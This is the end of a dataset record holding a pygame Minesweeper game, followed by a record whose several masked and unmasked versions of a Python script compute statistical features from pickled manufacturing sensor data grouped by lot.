GRID_HEIGHT) + (CELL_MARGIN * GRID_HEIGHT) + (Y_BOARD_MARGIN * 2)\nWINDOW_WIDTH = (CELL_SIDE_LENGTH * GRID_WIDTH) + (CELL_MARGIN * GRID_WIDTH) + (X_BOARD_MARGIN * 2) + MENU_MARGIN\n\n# R G B (not all used, but kept so theme can easily be changed)\nRED = (255, 0, 0)\nYELLOW = (255, 255, 0)\nGREEN = (0, 255, 0)\nMIDGREEN = (40, 190, 40)\nCYAN = (0, 255, 255)\nBLUE = (0, 0, 255)\nDARKBLUE = (20, 20, 60)\nMAGENTA = (255, 0, 255)\nBLACK = (0, 0, 0)\nWHITE = (255, 255, 255)\nGRAY = (200, 200, 200)\n\nBG_COLOR = DARKBLUE # Background color\nCELL_COLOR = GRAY # Universal cover color\nHIGHLIGHT_COLOR = CYAN # Cell the cursor is currently hovering over\nFLAG_COLOR = MIDGREEN\n\n# Symbols\nFLAG = 'flag'\nMINE = 'mine'\nCLEAR = 'clear'\n\n\nclass Game:\n def __init__(self):\n pygame.init()\n global CLOCK, SURFACE\n CLOCK = pygame.time.Clock()\n SURFACE = pygame.display.set_mode((WINDOW_WIDTH, WINDOW_HEIGHT))\n\n 
self.mouse_x = 0 # Stores x-coordinate of mouse event\n self.mouse_y = 0 # Stores y-coordinate of mouse event\n pygame.display.set_caption('Minesweeper by Alyssa Moore 2017')\n\n self.board = self.get_board()\n self.revealed_cells = self.generate_data(False)\n self.flags = self.generate_data(False)\n self.questionmarks = self.generate_data(False)\n self.game_over = False\n self.timer = Stopwatch()\n\n SURFACE.fill(BG_COLOR)\n\n def main(self):\n\n while True:\n left_click = False\n right_click = False\n\n SURFACE.fill(BG_COLOR)\n self.draw_board(self.board, self.revealed_cells, self.flags, self.questionmarks)\n self.create_menu()\n\n font = pygame.font.SysFont(\"times new roman\", 25)\n\n # Timer (will be used to implement high scores)\n self.timer.start()\n t1 = self.timer.get_seconds()\n label = font.render(str(t1), 1, MAGENTA)\n SURFACE.blit(label, (50, 50))\n\n # Mouse event handling\n for event in pygame.event.get():\n if event.type == pygame.locals.QUIT:\n pygame.quit()\n sys.exit() # Even if the window closes, we still need to manually stop the processes\n elif event.type == pygame.locals.MOUSEMOTION:\n self.mouse_x, self.mouse_y = event.pos # For hovering info\n elif event.type == pygame.locals.MOUSEBUTTONDOWN and event.button == 1: # Left click\n self.mouse_x, self.mouse_y = event.pos\n print(self.mouse_x, self.mouse_y)\n left_click = True\n elif event.type == pygame.locals.MOUSEBUTTONDOWN and event.button == 3: # Right click\n self.mouse_x, self.mouse_y = event.pos\n right_click = True\n\n # If user decided to start over, reinitialize game\n if self.game_over and right_click:\n self.board = self.get_board()\n self.revealed_cells = self.generate_data(False)\n self.flags = self.generate_data(False)\n self.questionmarks = self.generate_data(False)\n self.game_over = False\n self.timer = Stopwatch()\n right_click = False\n\n # TODO tweak spacing on text\n if self.game_over:\n self.timer.pause()\n score = self.timer.get_seconds()\n\n a_x = X_BOARD_MARGIN + 
((GRID_WIDTH / 4) * CELL_SIDE_LENGTH)\n b_y = Y_BOARD_MARGIN + (Y_BOARD_MARGIN / 4) + (GRID_HEIGHT * CELL_SIDE_LENGTH) + (GRID_HEIGHT * CELL_MARGIN)\n font = pygame.font.SysFont(\"times new roman\", 25)\n if win:\n label = font.render('Congratulations, you won!', 1, GREEN)\n SURFACE.blit(label, (a_x - 75, b_y))\n label = font.render('Score: ' + str(score), 1, GREEN)\n SURFACE.blit(label, (a_x + 200, b_y))\n else:\n label = font.render('GAME OVER', 1, RED)\n SURFACE.blit(label, (a_x + 10, b_y))\n label = font.render('Press RIGHT mouse button', 1, YELLOW)\n SURFACE.blit(label, (a_x - 50, b_y + 25))\n\n cell_x, cell_y = self.get_cell_at_pixel(self.mouse_x, self.mouse_y)\n if cell_x is not None and cell_y is not None: # If mouse is hovering over a cell during mouse event\n\n # Highlight cell\n if not self.revealed_cells[cell_x][cell_y] and not self.game_over:\n self.highlight_cell(cell_x, cell_y)\n\n # Digging somewhere\n if not self.revealed_cells[cell_x][cell_y] and left_click and not self.game_over:\n\n # So you can't accidentally click a flagged/question mark space\n if not self.flags[cell_x][cell_y] and not self.questionmarks[cell_x][cell_y]:\n\n self.flags[cell_x][cell_y] = False\n\n if self.board[cell_x][cell_y][0] == MINE: # If you dig a mine, reveal all cells & game over\n self.revealed_cells = self.generate_data(True)\n self.game_over = True\n\n elif self.board[cell_x][cell_y][0] == CLEAR: # If you dig a clear cell, reveal that cell\n self.reveal_cells(cell_x, cell_y, self.board, self.revealed_cells, self.flags, self.questionmarks)\n\n else:\n self.revealed_cells[cell_x][cell_y] = True # Set the cell as revealed\n\n # Redraw board after mouse event\n self.draw_board(self.board, self.revealed_cells, self.flags, self.questionmarks)\n\n # Placing a flag- if flag already there, change flag to question mark.\n # If question mark already there, turn to nothing. 
If nothing there, turn on flag\n if not self.revealed_cells[cell_x][cell_y] and right_click and not self.game_over:\n if self.flags[cell_x][cell_y]:\n self.flags[cell_x][cell_y] = False\n self.questionmarks[cell_x][cell_y] = True\n elif self.questionmarks[cell_x][cell_y]:\n self.questionmarks[cell_x][cell_y] = False\n self.flags[cell_x][cell_y] = False\n else:\n self.flags[cell_x][cell_y] = True\n self.questionmarks[cell_x][cell_y] = False\n\n # Flag is drawn in this method call\n self.draw_board(self.board, self.revealed_cells, self.flags, self.questionmarks)\n\n # This block decides whether or not the player has won yet after a mouse event\n win = True\n for x in range(GRID_WIDTH): # If a cell is a mine and not flagged, or if a cell is clear\n for y in range(GRID_HEIGHT): # but not revealed, then the game is not yet over\n if (self.board[x][y][0] == MINE and not self.flags[x][y]) or (\n self.board[x][y][0] != MINE and not self.revealed_cells[x][y]):\n win = False\n\n if win:\n self.game_over = True\n\n # Redraw the screen and wait for clock tick\n pygame.display.update()\n CLOCK.tick(FPS)\n\n @staticmethod\n def get_board():\n icons = []\n mines = 0\n\n # Bottom of board is made of only mines and clear cells, which is then selectively covered for gameplay\n # Making randomized array\n for x in range(GRID_WIDTH):\n for y in range(GRID_HEIGHT):\n if mines < NUM_MINES:\n icons.append((MINE, RED))\n mines += 1\n else:\n icons.append((CLEAR, WHITE))\n random.shuffle(icons)\n\n # Create static under-board\n board = []\n for x in range(GRID_WIDTH):\n column = []\n for y in range(GRID_HEIGHT):\n column.append(icons[0])\n del icons[0] # so the next icon[0] is the one after this\n board.append(column)\n\n # This block determines how many mines are around each cell, and adds the number to the board's array\n for x in range(GRID_WIDTH):\n for y in range(GRID_HEIGHT):\n mines = 0\n\n if x > 0:\n if y > 0: # If not on the left edge AND not on top edge\n if board[x - 1][y - 
1][0] == MINE:\n mines += 1\n if board[x - 1][y][0] == MINE:\n mines += 1\n if y < GRID_HEIGHT - 1:\n if board[x - 1][y + 1][0] == MINE:\n mines += 1\n\n if x < GRID_WIDTH - 1:\n if y > 0: # If not on right edge AND not on top edge\n if board[x + 1][y - 1][0] == MINE:\n mines += 1\n if board[x + 1][y][0] == MINE:\n mines += 1\n if y < GRID_HEIGHT - 1:\n if board[x + 1][y + 1][0] == MINE:\n mines += 1\n\n if y > 0: # If not on right or left edge AND not on top edge\n if board[x][y - 1][0] == MINE:\n mines += 1\n\n if y < GRID_HEIGHT - 1: # If not on riht or left edge AND on bottom edge\n if board[x][y + 1][0] == MINE:\n mines += 1\n\n # If the cell is clear and there are mines around it, add the number of mines to board array\n if board[x][y][0] != MINE:\n if mines in range(1, 9):\n board[x][y] = (str(mines), WHITE)\n\n return board\n\n # Used to show full board on game over & reset board on game start\n @staticmethod\n def generate_data(val):\n clear = []\n for i in range(GRID_WIDTH):\n clear.append([val] * GRID_HEIGHT)\n return clear\n\n # Convert row, column coordinates into x, y pixel coordinates (for drawing shapes)\n @staticmethod\n def get_top_left_coordinates(row, column):\n left = row * (CELL_SIDE_LENGTH + CELL_MARGIN) + X_BOARD_MARGIN\n top = column * (CELL_SIDE_LENGTH + CELL_MARGIN) + Y_BOARD_MARGIN\n return left, top\n\n # Convert x, y pixel coordinates to row, column coordinates (for mouse hovering)\n def get_cell_at_pixel(self, x, y):\n for cell_x in range(GRID_WIDTH):\n for cell_y in range(GRID_HEIGHT):\n left, top = self.get_top_left_coordinates(cell_x, cell_y)\n cell_rect = pygame.Rect(left, top, CELL_SIDE_LENGTH, CELL_SIDE_LENGTH)\n if cell_rect.collidepoint(x, y): # If currently hovering over a cell\n return cell_x, cell_y\n return None, None # If not currently hovering over a cell\n\n # Redraws board after mouse event\n def draw_board(self, board, revealed, flags, questionmarks):\n for cell_x in range(GRID_WIDTH):\n for cell_y in 
range(GRID_HEIGHT):\n left, top = self.get_top_left_coordinates(cell_x, cell_y)\n\n # Symbols not added on board creation must be drawn here: \"unrevealed\" boxes, flags, and question marks\n if not revealed[cell_x][cell_y]:\n # Draw a gray box over unrevealed cell, so value isn't affected but user can't see the value\n pygame.draw.rect(SURFACE, CELL_COLOR, (left, top, CELL_SIDE_LENGTH, CELL_SIDE_LENGTH))\n\n if flags[cell_x][cell_y]:\n half = int(CELL_SIDE_LENGTH * 0.5) # Relative point halfway through cell\n # top point, bottom left point, bottom right point\n pygame.draw.polygon(SURFACE, FLAG_COLOR, [(half + left, top),\n (left, top + CELL_SIDE_LENGTH - CELL_MARGIN/2),\n (left + CELL_SIDE_LENGTH - CELL_MARGIN/2, top +\n CELL_SIDE_LENGTH - CELL_MARGIN/2)])\n elif questionmarks[cell_x][cell_y]:\n quarter = int(CELL_SIDE_LENGTH * 0.25)\n pygame.draw.rect(SURFACE, GRAY, (left, top, CELL_SIDE_LENGTH, CELL_SIDE_LENGTH))\n fontsize = int(CELL_SIDE_LENGTH)\n font = pygame.font.SysFont(\"times new roman\", fontsize)\n label = font.render(\"?\", 1, BLACK)\n SURFACE.blit(label, (left + quarter, top))\n\n else: # Draw revealed cells\n shape, color = self.get_shape_and_color(board, cell_x, cell_y)\n self.draw_icon(shape, color, cell_x, cell_y)\n\n # Draws icon passed to it in the stated cell\n def draw_icon(self, shape, color, cell_x, cell_y):\n\n # Relative point of quarter-way through cell\n quarter = int(CELL_SIDE_LENGTH * 0.25)\n\n left, top = self.get_top_left_coordinates(cell_x, cell_y) # Drawing of all images starts at top left corner\n\n # Draw the shapes\n if shape == CLEAR:\n pygame.draw.rect(SURFACE, color, (left, top, CELL_SIDE_LENGTH, CELL_SIDE_LENGTH))\n\n elif shape == MINE:\n pygame.draw.ellipse(SURFACE, color, (left, top, CELL_SIDE_LENGTH, CELL_SIDE_LENGTH))\n\n # Flag shape & question mark in draw_board because they are activated via mouse event\n\n else: # Clear with num\n pygame.draw.rect(SURFACE, color, (left, top, CELL_SIDE_LENGTH, CELL_SIDE_LENGTH))\n 
fontsize = int(CELL_SIDE_LENGTH)\n font = pygame.font.SysFont(\"times new roman\", fontsize)\n label = font.render(shape, 1, BLACK) # a cell with number corresponds to shapes \"1\", \"2\", etc.\n SURFACE.blit(label, (left + quarter, top))\n\n # Returns the shape and color of icon to be created in draw_icon method\n @staticmethod\n def get_shape_and_color(board, cell_x, cell_y):\n # shape value for cell x, y is stored in board[x][y][0], color value in board[x][y][1]\n return board[cell_x][cell_y][0], board[cell_x][cell_y][1]\n\n # Draws a box around the cell the mouse is hovering over, 'highlighting' it\n def highlight_cell(self, cell_x, cell_y):\n left, top = self.get_top_left_coordinates(cell_x, cell_y)\n # Changes with cell size, but line width is hard-set at 2px (last argument)\n pygame.draw.rect(SURFACE, HIGHLIGHT_COLOR, (left - (CELL_MARGIN / 2), top - (CELL_MARGIN / 2),\n CELL_SIDE_LENGTH + CELL_MARGIN, CELL_SIDE_LENGTH + CELL_MARGIN), 2)\n\n # Reveals clear cells next to clear cell the user clicked (and clear cells next to those cells, etc.)\n def reveal_cells(self, x, y, board, revealed, flags, questionmarks):\n if revealed[x][y]: # If the cell is already revealed, do nothing\n return\n if flags[x][y]: # If the cell already has a flag on it, do nothing\n return\n revealed[x][y] = True\n if board[x][y][0] != CLEAR:\n return\n if x > 0:\n if y > 0:\n self.reveal_cells(x - 1, y - 1, board, revealed, flags, questionmarks)\n self.reveal_cells(x - 1, y, board, revealed, flags, questionmarks)\n if y < GRID_HEIGHT - 1:\n self.reveal_cells(x - 1, y + 1, board, revealed, flags, questionmarks)\n\n if x < GRID_WIDTH - 1:\n if y > 0:\n self.reveal_cells(x + 1, y - 1, board, revealed, flags, questionmarks)\n self.reveal_cells(x + 1, y, board, revealed, flags, questionmarks)\n if y < GRID_HEIGHT - 1:\n self.reveal_cells(x + 1, y + 1, board, revealed, flags, questionmarks)\n\n if y > 0:\n self.reveal_cells(x, y - 1, board, revealed, flags, questionmarks)\n\n if y < 
GRID_HEIGHT - 1:\n self.reveal_cells(x, y + 1, board, revealed, flags, questionmarks)\n\n @staticmethod\n def create_menu():\n font = pygame.font.SysFont(\"times new roman\", 20)\n label = font.render(\" High scores\", 1, BLACK)\n pygame.draw.rect(SURFACE, GRAY, (500, 125, 105, 50)) # view high scores\n SURFACE.blit(label, (500, 135))\n\n\nclass Stopwatch:\n def __init__(self):\n self.seconds = 0\n self.running = False\n self.latest_time = None\n\n def start(self):\n if not self.running:\n self.running = True\n self.latest_time = time.time()\n\n def get_seconds(self):\n t1 = self.seconds\n if self.running:\n t1 += time.time() - self.latest_time\n return int(t1)\n\n def pause(self):\n if self.running:\n self.running = False\n self.seconds += time.time() - self.latest_time\n\n\ng = Game()\ng.main()\n", "step-ids": [ 10, 16, 17, 21, 22 ] }
[ 10, 16, 17, 21, 22 ]
<|reserved_special_token_0|> <|reserved_special_token_1|> <|reserved_special_token_0|> def file_name(file_dir): root_tmp = [] dirs_tmp = [] files_tmp = [] for root, dirs, files in os.walk(file_dir): root_tmp.append(root) dirs_tmp.append(dirs) files_tmp.append(files) return root_tmp, dirs_tmp, files_tmp <|reserved_special_token_0|> for key in lot_list: if key in combined_all.keys(): print('The Lot %d in %s already existed in %s' % (key, file_tmp, combined_all[key])) <|reserved_special_token_0|> for row_tmp in df.index: lot_tmp = df.iloc[row_tmp, :].Lot if lot_tmp == lot_last: list_tmp.append(df.iloc[row_tmp, :]) counter += 1 else: df_tmp = pd.concat(list_tmp, axis=1) combined_all[df_tmp.T.time.iloc[-1]] = df_tmp.T feature_tmp = df_tmp.T.iloc[:, 7:] feature_tmp = df_scaler.fit_transform(feature_tmp) t1 = np.mean(feature_tmp) t2 = np.std(feature_tmp) t3 = np.mean(np.sqrt(np.abs(feature_tmp))) ** 2 t4 = np.sqrt(np.mean(feature_tmp ** 2)) t5 = np.max(feature_tmp) t6 = np.sum((feature_tmp - t1) ** 3) / ((len(feature_tmp) - 1) * t2 ** 3) t7 = np.sum((feature_tmp - t1) ** 4) / ((len(feature_tmp) - 1) * t2 ** 4) t8 = t5 / t4 t9 = t5 / t3 t10 = t4 / (np.sum(np.abs(feature_tmp)) / len(feature_tmp)) t11 = t5 / (np.sum(np.abs(feature_tmp)) / len(feature_tmp)) feature_all.loc[idx, :] = [t1, t2, t3, t4, t5, t6, t7, t8, t9, t10, t11, df_tmp.T.time.iloc[0], df_tmp.T.time.iloc[-1], df_tmp.T. 
recipe.iloc[0], df_tmp.T.stage.iloc[0], lot_last] list_tmp = [] idx += 1 counter = 0 lot_last = lot_tmp print(row_tmp) <|reserved_special_token_1|> <|reserved_special_token_0|> def file_name(file_dir): root_tmp = [] dirs_tmp = [] files_tmp = [] for root, dirs, files in os.walk(file_dir): root_tmp.append(root) dirs_tmp.append(dirs) files_tmp.append(files) return root_tmp, dirs_tmp, files_tmp root = '/home/ninja1mmm/Desktop/phm/data' root_tmp, dirs_tmp, files_tmp = file_name(root) combined_all = {} feature_all = pd.DataFrame(columns=['mean', 'std', 'root amplitude', 'rms', 'max', 'skewness', 'kurtosis', 'peak factor', 'margin', 'waveform', 'pulse', 'start_time', 'end_time', 'recipe', 'stage', 'Lot']) file_tmp = files_tmp[2][0] path_tmp = root_tmp[2] + '/' + file_tmp df = pd.read_pickle(path_tmp) df = df.replace([np.inf, -np.inf], np.nan).dropna() df = df.reset_index(drop=True) df_scaler = preprocessing.MinMaxScaler(feature_range=(0, 1)) lot_list = list(set(df.Lot)) for key in lot_list: if key in combined_all.keys(): print('The Lot %d in %s already existed in %s' % (key, file_tmp, combined_all[key])) list_tmp = [] lot_last = df.Lot[0] counter = 0 idx = 0 for row_tmp in df.index: lot_tmp = df.iloc[row_tmp, :].Lot if lot_tmp == lot_last: list_tmp.append(df.iloc[row_tmp, :]) counter += 1 else: df_tmp = pd.concat(list_tmp, axis=1) combined_all[df_tmp.T.time.iloc[-1]] = df_tmp.T feature_tmp = df_tmp.T.iloc[:, 7:] feature_tmp = df_scaler.fit_transform(feature_tmp) t1 = np.mean(feature_tmp) t2 = np.std(feature_tmp) t3 = np.mean(np.sqrt(np.abs(feature_tmp))) ** 2 t4 = np.sqrt(np.mean(feature_tmp ** 2)) t5 = np.max(feature_tmp) t6 = np.sum((feature_tmp - t1) ** 3) / ((len(feature_tmp) - 1) * t2 ** 3) t7 = np.sum((feature_tmp - t1) ** 4) / ((len(feature_tmp) - 1) * t2 ** 4) t8 = t5 / t4 t9 = t5 / t3 t10 = t4 / (np.sum(np.abs(feature_tmp)) / len(feature_tmp)) t11 = t5 / (np.sum(np.abs(feature_tmp)) / len(feature_tmp)) feature_all.loc[idx, :] = [t1, t2, t3, t4, t5, t6, t7, t8, 
t9, t10, t11, df_tmp.T.time.iloc[0], df_tmp.T.time.iloc[-1], df_tmp.T. recipe.iloc[0], df_tmp.T.stage.iloc[0], lot_last] list_tmp = [] idx += 1 counter = 0 lot_last = lot_tmp print(row_tmp) <|reserved_special_token_1|> <|reserved_special_token_0|> import os import numpy as np import pandas as pd from sklearn import preprocessing def file_name(file_dir): root_tmp = [] dirs_tmp = [] files_tmp = [] for root, dirs, files in os.walk(file_dir): root_tmp.append(root) dirs_tmp.append(dirs) files_tmp.append(files) return root_tmp, dirs_tmp, files_tmp root = '/home/ninja1mmm/Desktop/phm/data' root_tmp, dirs_tmp, files_tmp = file_name(root) combined_all = {} feature_all = pd.DataFrame(columns=['mean', 'std', 'root amplitude', 'rms', 'max', 'skewness', 'kurtosis', 'peak factor', 'margin', 'waveform', 'pulse', 'start_time', 'end_time', 'recipe', 'stage', 'Lot']) file_tmp = files_tmp[2][0] path_tmp = root_tmp[2] + '/' + file_tmp df = pd.read_pickle(path_tmp) df = df.replace([np.inf, -np.inf], np.nan).dropna() df = df.reset_index(drop=True) df_scaler = preprocessing.MinMaxScaler(feature_range=(0, 1)) lot_list = list(set(df.Lot)) for key in lot_list: if key in combined_all.keys(): print('The Lot %d in %s already existed in %s' % (key, file_tmp, combined_all[key])) list_tmp = [] lot_last = df.Lot[0] counter = 0 idx = 0 for row_tmp in df.index: lot_tmp = df.iloc[row_tmp, :].Lot if lot_tmp == lot_last: list_tmp.append(df.iloc[row_tmp, :]) counter += 1 else: df_tmp = pd.concat(list_tmp, axis=1) combined_all[df_tmp.T.time.iloc[-1]] = df_tmp.T feature_tmp = df_tmp.T.iloc[:, 7:] feature_tmp = df_scaler.fit_transform(feature_tmp) t1 = np.mean(feature_tmp) t2 = np.std(feature_tmp) t3 = np.mean(np.sqrt(np.abs(feature_tmp))) ** 2 t4 = np.sqrt(np.mean(feature_tmp ** 2)) t5 = np.max(feature_tmp) t6 = np.sum((feature_tmp - t1) ** 3) / ((len(feature_tmp) - 1) * t2 ** 3) t7 = np.sum((feature_tmp - t1) ** 4) / ((len(feature_tmp) - 1) * t2 ** 4) t8 = t5 / t4 t9 = t5 / t3 t10 = t4 / 
(np.sum(np.abs(feature_tmp)) / len(feature_tmp)) t11 = t5 / (np.sum(np.abs(feature_tmp)) / len(feature_tmp)) feature_all.loc[idx, :] = [t1, t2, t3, t4, t5, t6, t7, t8, t9, t10, t11, df_tmp.T.time.iloc[0], df_tmp.T.time.iloc[-1], df_tmp.T. recipe.iloc[0], df_tmp.T.stage.iloc[0], lot_last] list_tmp = [] idx += 1 counter = 0 lot_last = lot_tmp print(row_tmp) <|reserved_special_token_1|> #!/usr/bin/env python3 # -*- coding: utf-8 -*- """ Created on Wed Jul 18 13:37:10 2018 @author: ninja1mmm """ import os import numpy as np import pandas as pd from sklearn import preprocessing def file_name(file_dir): root_tmp=[] dirs_tmp=[] files_tmp=[] for root, dirs, files in os.walk(file_dir): root_tmp.append(root) dirs_tmp.append(dirs) files_tmp.append(files) return root_tmp, dirs_tmp, files_tmp root = '/home/ninja1mmm/Desktop/phm/data' root_tmp, dirs_tmp, files_tmp = file_name(root) combined_all = {} feature_all = pd.DataFrame(columns = ['mean', 'std','root amplitude', 'rms','max','skewness','kurtosis', 'peak factor','margin','waveform', 'pulse','start_time', 'end_time', 'recipe', 'stage', 'Lot']) #df_check = pd.DataFrame() # read the first file to test here file_tmp = files_tmp[2][0] # iterate through the files if needed #for file_tmp in files_tmp[2]: path_tmp = root_tmp[2]+'/'+file_tmp df = pd.read_pickle(path_tmp) #df_tmp = df[df['Lot']==28113] #if len(df_tmp)>0: # df_tmp = df_tmp.iloc[0,:] # df_check = df_check.append(df_tmp) #------------------------------------------------------------------------------ # Crucial step df=df.replace([np.inf, -np.inf], np.nan).dropna() df=df.reset_index(drop=True) df_scaler = preprocessing.MinMaxScaler(feature_range = (0,1)) #------------------------------------------------------------------------------ lot_list = list(set(df.Lot)) # Check if Lot already existed for key in lot_list: if key in combined_all.keys(): print('The Lot %d in %s already existed in %s' % (key, file_tmp, combined_all[key])) # for tmp in lot_list: # combined_all[tmp] = 
file_tmp # Select and save all the wafer processing cycles list_tmp = [] lot_last = df.Lot[0] counter = 0 idx = 0 # Specify the range. Here set to 100000 for the ease of test for row_tmp in df.index: lot_tmp = df.iloc[row_tmp,:].Lot if lot_tmp == lot_last: list_tmp.append(df.iloc[row_tmp,:]) counter += 1 else: df_tmp = pd.concat(list_tmp, axis = 1) # lot_last serves as the key, can be changed # combined_all[lot_last] = df_tmp.T combined_all[df_tmp.T.time.iloc[-1]] = df_tmp.T # Calculate mean and save in feature dictionary as an example # Normalize the data again because for some parameters we need the local (within cycle) feature feature_tmp = df_tmp.T.iloc[:,7:] # Not a correct way, because shutter position also need to be excluded feature_tmp = df_scaler.fit_transform(feature_tmp) # ------------------------------------------------------------------ # Add features here. Remember to add new columns when initialzing df t1 = np.mean(feature_tmp) t2 = np.std(feature_tmp) t3 = np.mean(np.sqrt(np.abs(feature_tmp)))**2 t4 = np.sqrt(np.mean(feature_tmp**2)) t5 = np.max(feature_tmp) t6 = np.sum((feature_tmp-t1)**3)/((len(feature_tmp)-1)*(t2**3)) t7 = np.sum((feature_tmp-t1)**4)/((len(feature_tmp)-1)*(t2**4)) t8 = t5/t4 t9 = t5/t3 t10 = t4/(np.sum(np.abs(feature_tmp))/len(feature_tmp)) t11 = t5/(np.sum(np.abs(feature_tmp))/(len(feature_tmp))) # Newly added # First order difference # --------------------------------------------------------------------- feature_all.loc[idx,:] = [t1,t2,t3,t4,t5,t6,t7,t8,t9,t10,t11, df_tmp.T.time.iloc[0],df_tmp.T.time.iloc[-1], df_tmp.T.recipe.iloc[0],df_tmp.T.stage.iloc[0], lot_last] list_tmp = [] idx += 1 counter = 0 lot_last = lot_tmp print(row_tmp) #------------------------------------------------------------------------------
flexible
{ "blob_id": "96d5cf948a9b0f622889977e8b26993299bceead", "index": 770, "step-1": "<mask token>\n", "step-2": "<mask token>\n\n\ndef file_name(file_dir):\n root_tmp = []\n dirs_tmp = []\n files_tmp = []\n for root, dirs, files in os.walk(file_dir):\n root_tmp.append(root)\n dirs_tmp.append(dirs)\n files_tmp.append(files)\n return root_tmp, dirs_tmp, files_tmp\n\n\n<mask token>\nfor key in lot_list:\n if key in combined_all.keys():\n print('The Lot %d in %s already existed in %s' % (key, file_tmp,\n combined_all[key]))\n<mask token>\nfor row_tmp in df.index:\n lot_tmp = df.iloc[row_tmp, :].Lot\n if lot_tmp == lot_last:\n list_tmp.append(df.iloc[row_tmp, :])\n counter += 1\n else:\n df_tmp = pd.concat(list_tmp, axis=1)\n combined_all[df_tmp.T.time.iloc[-1]] = df_tmp.T\n feature_tmp = df_tmp.T.iloc[:, 7:]\n feature_tmp = df_scaler.fit_transform(feature_tmp)\n t1 = np.mean(feature_tmp)\n t2 = np.std(feature_tmp)\n t3 = np.mean(np.sqrt(np.abs(feature_tmp))) ** 2\n t4 = np.sqrt(np.mean(feature_tmp ** 2))\n t5 = np.max(feature_tmp)\n t6 = np.sum((feature_tmp - t1) ** 3) / ((len(feature_tmp) - 1) * t2 **\n 3)\n t7 = np.sum((feature_tmp - t1) ** 4) / ((len(feature_tmp) - 1) * t2 **\n 4)\n t8 = t5 / t4\n t9 = t5 / t3\n t10 = t4 / (np.sum(np.abs(feature_tmp)) / len(feature_tmp))\n t11 = t5 / (np.sum(np.abs(feature_tmp)) / len(feature_tmp))\n feature_all.loc[idx, :] = [t1, t2, t3, t4, t5, t6, t7, t8, t9, t10,\n t11, df_tmp.T.time.iloc[0], df_tmp.T.time.iloc[-1], df_tmp.T.\n recipe.iloc[0], df_tmp.T.stage.iloc[0], lot_last]\n list_tmp = []\n idx += 1\n counter = 0\n lot_last = lot_tmp\n print(row_tmp)\n", "step-3": "<mask token>\n\n\ndef file_name(file_dir):\n root_tmp = []\n dirs_tmp = []\n files_tmp = []\n for root, dirs, files in os.walk(file_dir):\n root_tmp.append(root)\n dirs_tmp.append(dirs)\n files_tmp.append(files)\n return root_tmp, dirs_tmp, files_tmp\n\n\nroot = '/home/ninja1mmm/Desktop/phm/data'\nroot_tmp, dirs_tmp, files_tmp = file_name(root)\ncombined_all = 
{}\nfeature_all = pd.DataFrame(columns=['mean', 'std', 'root amplitude', 'rms',\n 'max', 'skewness', 'kurtosis', 'peak factor', 'margin', 'waveform',\n 'pulse', 'start_time', 'end_time', 'recipe', 'stage', 'Lot'])\nfile_tmp = files_tmp[2][0]\npath_tmp = root_tmp[2] + '/' + file_tmp\ndf = pd.read_pickle(path_tmp)\ndf = df.replace([np.inf, -np.inf], np.nan).dropna()\ndf = df.reset_index(drop=True)\ndf_scaler = preprocessing.MinMaxScaler(feature_range=(0, 1))\nlot_list = list(set(df.Lot))\nfor key in lot_list:\n if key in combined_all.keys():\n print('The Lot %d in %s already existed in %s' % (key, file_tmp,\n combined_all[key]))\nlist_tmp = []\nlot_last = df.Lot[0]\ncounter = 0\nidx = 0\nfor row_tmp in df.index:\n lot_tmp = df.iloc[row_tmp, :].Lot\n if lot_tmp == lot_last:\n list_tmp.append(df.iloc[row_tmp, :])\n counter += 1\n else:\n df_tmp = pd.concat(list_tmp, axis=1)\n combined_all[df_tmp.T.time.iloc[-1]] = df_tmp.T\n feature_tmp = df_tmp.T.iloc[:, 7:]\n feature_tmp = df_scaler.fit_transform(feature_tmp)\n t1 = np.mean(feature_tmp)\n t2 = np.std(feature_tmp)\n t3 = np.mean(np.sqrt(np.abs(feature_tmp))) ** 2\n t4 = np.sqrt(np.mean(feature_tmp ** 2))\n t5 = np.max(feature_tmp)\n t6 = np.sum((feature_tmp - t1) ** 3) / ((len(feature_tmp) - 1) * t2 **\n 3)\n t7 = np.sum((feature_tmp - t1) ** 4) / ((len(feature_tmp) - 1) * t2 **\n 4)\n t8 = t5 / t4\n t9 = t5 / t3\n t10 = t4 / (np.sum(np.abs(feature_tmp)) / len(feature_tmp))\n t11 = t5 / (np.sum(np.abs(feature_tmp)) / len(feature_tmp))\n feature_all.loc[idx, :] = [t1, t2, t3, t4, t5, t6, t7, t8, t9, t10,\n t11, df_tmp.T.time.iloc[0], df_tmp.T.time.iloc[-1], df_tmp.T.\n recipe.iloc[0], df_tmp.T.stage.iloc[0], lot_last]\n list_tmp = []\n idx += 1\n counter = 0\n lot_last = lot_tmp\n print(row_tmp)\n", "step-4": "<mask token>\nimport os\nimport numpy as np\nimport pandas as pd\nfrom sklearn import preprocessing\n\n\ndef file_name(file_dir):\n root_tmp = []\n dirs_tmp = []\n files_tmp = []\n for root, dirs, files in 
os.walk(file_dir):\n root_tmp.append(root)\n dirs_tmp.append(dirs)\n files_tmp.append(files)\n return root_tmp, dirs_tmp, files_tmp\n\n\nroot = '/home/ninja1mmm/Desktop/phm/data'\nroot_tmp, dirs_tmp, files_tmp = file_name(root)\ncombined_all = {}\nfeature_all = pd.DataFrame(columns=['mean', 'std', 'root amplitude', 'rms',\n 'max', 'skewness', 'kurtosis', 'peak factor', 'margin', 'waveform',\n 'pulse', 'start_time', 'end_time', 'recipe', 'stage', 'Lot'])\nfile_tmp = files_tmp[2][0]\npath_tmp = root_tmp[2] + '/' + file_tmp\ndf = pd.read_pickle(path_tmp)\ndf = df.replace([np.inf, -np.inf], np.nan).dropna()\ndf = df.reset_index(drop=True)\ndf_scaler = preprocessing.MinMaxScaler(feature_range=(0, 1))\nlot_list = list(set(df.Lot))\nfor key in lot_list:\n if key in combined_all.keys():\n print('The Lot %d in %s already existed in %s' % (key, file_tmp,\n combined_all[key]))\nlist_tmp = []\nlot_last = df.Lot[0]\ncounter = 0\nidx = 0\nfor row_tmp in df.index:\n lot_tmp = df.iloc[row_tmp, :].Lot\n if lot_tmp == lot_last:\n list_tmp.append(df.iloc[row_tmp, :])\n counter += 1\n else:\n df_tmp = pd.concat(list_tmp, axis=1)\n combined_all[df_tmp.T.time.iloc[-1]] = df_tmp.T\n feature_tmp = df_tmp.T.iloc[:, 7:]\n feature_tmp = df_scaler.fit_transform(feature_tmp)\n t1 = np.mean(feature_tmp)\n t2 = np.std(feature_tmp)\n t3 = np.mean(np.sqrt(np.abs(feature_tmp))) ** 2\n t4 = np.sqrt(np.mean(feature_tmp ** 2))\n t5 = np.max(feature_tmp)\n t6 = np.sum((feature_tmp - t1) ** 3) / ((len(feature_tmp) - 1) * t2 **\n 